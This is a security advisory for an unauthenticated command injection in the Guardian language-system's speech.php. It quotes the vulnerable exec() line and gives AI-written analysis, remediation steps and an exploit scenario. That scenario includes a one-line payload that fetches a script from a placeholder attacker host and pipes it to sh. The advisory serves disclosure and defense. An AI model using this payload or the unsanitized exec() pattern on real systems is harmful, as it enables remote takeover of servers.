DescriptionCVE.org

Guardian language-system passes the id GET parameter directly into a PHP exec() call in speech.php (line 18) without sanitization: exec(\"php jobs/speech_audio.php \".$login_session.\" \".$_GET['id'].\" ...\"). No authentication is required. An unauthenticated remote attacker can append shell metacharacters to execute arbitrary OS commands on the server.

AnalysisAI

OS command injection in the Guardian language-system lets an unauthenticated remote attacker run arbitrary shell commands by injecting metacharacters into the 'id' GET parameter, which speech.php passes unsanitized into a PHP exec() call. Rated CVSS 4.0 9.3 (Critical) with a fully remote, no-privilege, no-interaction vector, this is a direct pre-auth RCE. …

Vulnerability AssessmentAI

Exploitation No special conditions - remote unauthenticated exploitation against Guardian language-system installations that expose the speech.php endpoint. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment All available signals point to a genuine high priority. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker discovers an internet-facing Guardian language-system and sends a single crafted HTTP GET request to speech.php with an 'id' value such as '1;curl http://attacker/x.sh|sh', causing the appended command to execute on the server as the web user. With no authentication or user interaction required, the attacker gains immediate command execution and can pivot to install a webshell, exfiltrate data, or move laterally. …
Remediation No vendor-released patch version is identified at time of analysis, so no fixed version can be cited. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Restrict network access to speech.php or disable Guardian language-system features if operationally feasible; deploy Web Application Firewall (WAF) rules to block shell metacharacters in the 'id' GET parameter. …
